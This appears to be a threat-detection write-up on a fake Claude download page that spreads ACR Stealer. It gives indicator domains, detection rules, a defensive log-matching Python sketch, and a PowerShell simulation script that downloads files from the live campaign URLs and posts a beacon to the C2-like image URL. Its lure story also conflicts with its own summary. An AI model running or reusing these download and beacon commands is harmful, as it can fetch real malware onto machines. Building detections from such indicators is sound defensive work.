Claude Impersonation Page May Deliver ACR Stealer
Detection stack
- AIDR
- Alert
- ETL
- Query
Summary
Threat researchers identified a malicious advertising campaign that redirects users to a fake Claude download page. The site delivers different payloads depending on the victim’s operating system, with the Windows infection chain leading to deployment of ACRStealer. Investigators linked the activity to multiple compromised domains and a command-and-control server used after infection. The campaign relies on obfuscated URLs and a PowerShell script to complete payload delivery.
Investigation
The analyst traced the activity from the initial fake Claude page through several redirected URLs hosted across different domains. During the infection chain, a ZIP archive, a PowerShell script, and a JPEG image were downloaded, followed by HTTPS communication with a command-and-control domain. Traffic analysis confirmed that the post-infection network behavior matched infrastructure associated with the ACRStealer family.
Mitigation
Organizations should block the identified malicious domains and URLs at the network perimeter. Advertising traffic should be filtered for malicious ads that reference the fake Claude page or similar impersonation lures. Endpoint protection should also be configured to detect ACRStealer-related behavior and suspicious PowerShell execution.
Response
Defenders should monitor for outbound connections to the command-and-control domain yw.enhanceblabber.cc and alert on downloads of the identified ZIP archive and PowerShell script. Any host that shows related activity should undergo forensic collection for possible ACRStealer artifacts and be isolated if compromise is confirmed.
Attack Flow
We are still updating this part.
Detections
- Suspicious LOLBAS MSHTA Defense Evasion Behavior by Detection of Associated Commands (via process_creation)
- Suspicious Command and Control by Unusual Top Level Domain (TLD) DNS Request (via dns)
- IOCs (HashSha256) to detect: Possible ACR Stealer From Page Impersonating Claude
- Detection of ACR Stealer Distribution via Fake Claude Download Pages [Windows Network Connection]
Simulation Execution
Prerequisite: The Telemetry & Baseline Pre‑flight Check must have passed.
Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic.
- Attack Narrative & Commands:
  - Initial Lure: The attacker sends a phishing email containing a link to https://fairpoint29.com/. The victim clicks the link, which loads a fake Claude download page.
  - Malicious Downloader Execution: The page automatically triggers a download from https://primemetricsa.com/1518925, delivering a disguised payload.
  - Secondary Payload Retrieval: The downloaded stub contacts https://6ryuefl.creativecommunityinfo.art/Camel-91267b64-989f-49b4-89b4-9e015844d42d to fetch the full ACR Stealer binary.
  - C2 Beacon: Once executed, the malware posts a beacon to https://i.ibb.co/Xx16sbMz/init-block.jpg (a technique that abuses image hosting for covert C2).
  Each step generates a proxy log entry matching the exact domain and url values defined in the Sigma rule, thereby satisfying the detection condition.
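As an added illustration (not code from this page or from the detection platform), the Python below applies the detection condition described above to a few constructed proxy log lines: it flags the campaign's domain and URL values listed on this page and, as a second rule, requests to an assumed set of unusual TLDs. The proxy log layout, the TLD list, the timestamps and the rule names are assumptions.

```python
import re
from urllib.parse import urlparse

# Indicators copied from this page's narrative and Response section.
CAMPAIGN_DOMAINS = {
    "fairpoint29.com",
    "primemetricsa.com",
    "6ryuefl.creativecommunityinfo.art",
    "yw.enhanceblabber.cc",
}
# i.ibb.co is a legitimate image host, so it is matched only on the exact
# path the campaign used, never on the bare domain.
CAMPAIGN_URLS = {("i.ibb.co", "/Xx16sbMz/init-block.jpg")}
# Assumption: TLDs the "unusual TLD" rule treats as rare in this environment.
UNUSUAL_TLDS = {"cc", "art", "xyz", "top"}

# Assumed proxy log layout: "<timestamp> <src_ip> <method> <url> <status>"
LOG_RE = re.compile(r"^(\S+) (\S+) (GET|POST) (\S+) (\d{3})$")

def classify(line):
    """Return the rule names one proxy log line triggers (empty if none)."""
    m = LOG_RE.match(line.strip())
    if not m:
        return []
    url = urlparse(m.group(4))
    host = (url.hostname or "").lower()
    hits = []
    if host in CAMPAIGN_DOMAINS or (host, url.path) in CAMPAIGN_URLS:
        hits.append("acr_stealer_fake_claude_distribution")
    if host.rsplit(".", 1)[-1] in UNUSUAL_TLDS:
        hits.append("unusual_tld_dns_request")
    return hits

def scan(lines):
    """Map each log line that fires at least one rule to its rule names."""
    return {line: hits for line in lines if (hits := classify(line))}

# Constructed sample log: three campaign requests, one benign image fetch, one benign site.
SAMPLE_LOG = [
    "2024-01-01T10:00:01Z 10.0.0.5 GET https://fairpoint29.com/ 200",
    "2024-01-01T10:00:03Z 10.0.0.5 GET https://primemetricsa.com/1518925 200",
    "2024-01-01T10:00:09Z 10.0.0.5 POST https://i.ibb.co/Xx16sbMz/init-block.jpg 200",
    "2024-01-01T10:00:15Z 10.0.0.5 GET https://i.ibb.co/abc123/cat.jpg 200",
    "2024-01-01T10:00:20Z 10.0.0.7 GET https://www.example.com/ 200",
]
```

Calling scan(SAMPLE_LOG) returns only the first three lines; the unrelated i.ibb.co image fetch does not fire, which is the point of matching that host on its full path.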
- Regression Test Script:
# -------------------------------------------------
# ACR Stealer Distribution Simulation – Trigger Rule
# -------------------------------------------------
# Step 1: Fake Claude download page (harmless GET)
Invoke-WebRequest -Uri "https://fairpoint29.com/" -UseBasicParsing | Out-Null
# Step 2: Downloader binary (simulated by a small file download)
Invoke-WebRequest -Uri "https://primemetricsa.com/1518925" -OutFile "$env:TEMP\loader.bin" -UseBasicParsing
# Step 3: Full payload retrieval
Invoke-WebRequest -Uri "https://6ryuefl.creativecommunityinfo.art/Camel-91267b64-989f-49b4-89b4-9e015844d42d" `
    -OutFile "$env:TEMP\acr_stealer.bin" -UseBasicParsing
# Step 4: C2 beacon (POST of a small body to the image-hosting URL, mimicking the disguised beacon)
$body = [System.Text.Encoding]::UTF8.GetBytes("beacon")
Invoke-WebRequest -Uri "https://i.ibb.co/Xx16sbMz/init-block.jpg" `
    -Method Post -Body $body -ContentType "application/octet-stream" -UseBasicParsing | Out-Null
# -------------------------------------------------
# End of Simulation
# -------------------------------------------------
- Cleanup Commands:
# Remove downloaded artifacts
Remove-Item "$env:TEMP\loader.bin" -ErrorAction SilentlyContinue
Remove-Item "$env:TEMP\acr_stealer.bin" -ErrorAction SilentlyContinue
# Flush DNS cache to avoid lingering entries
ipconfig /flushdns